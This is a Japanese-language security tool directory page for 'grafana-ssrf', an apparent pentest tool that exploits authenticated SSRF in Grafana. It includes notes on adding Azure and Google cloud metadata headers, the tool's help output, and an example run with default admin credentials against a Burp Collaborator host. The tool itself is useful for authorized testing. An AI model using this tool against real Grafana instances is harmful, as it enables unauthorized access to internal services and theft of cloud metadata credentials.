Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/randomrobbiebf/grafana-ssrf
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集クラウドセキュリティレッドチーミング
GitHubrandomrobbiebf/grafana-ssrf

grafana-ssrf

Grafana における認証済み SSRF

リポジトリを見る
83272年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
grafana-ssrf — Grafana における認証済み SSRF | Kitploit

grafana-ssrf

Grafana における認証済み SSRF。

注意事項

  • すべての SSRF に Azure メタデータヘッダーが追加されました
  • すべての SSRF に Google メタデータヘッダーが追加されました
  • SSRF は何があってもリダイレクトを追跡しないため、URL が直接のものであることを確認してください。
  • ログインが SSO やその他の Grafana 以外のログインである場合は、セッション Cookie を取得して -s フラグを使用してください。

使用方法

root@kitploit:~
usage: grafana-ssrf.py [-h] [-s SESSION] [-u URL] [-H HOST] [-f FILE] [-U USERNAME]
                  [-P PASSWORD]

optional arguments:
  -h, --help            show this help message and exit
  -s SESSION, --session SESSION
                        Session Cookie Value
  -u URL, --url URL     URL of host to check will need http or https
  -H HOST, --host HOST  Host for Grafana
  -f FILE, --file FILE  File of URLS to check SSRF Against
  -U USERNAME, --username USERNAME
                        Username for Grafana
  -P PASSWORD, --password PASSWORD
                        Password for Grafana

例

root@kitploit:~
python3 grafana.py -U admin -P admin -H http://localhost:3000 -u http://8t2s8yx5gh5nw0z9bd3atkoprgx6lv.burpcollaborator.net
Refreshed Sources
SSRF Source Updated
Status code:   200
Response body: <html><body>c7yzzb4zyj5v14wkpi2nxvzjigz</body></html>
Deleted Old SSRF Source

募集中の求人もぜひチェックしてください!

https://bishopfox.com/jobs#open-positions - フォックスの仲間になりましょう!

ツールをダウンロード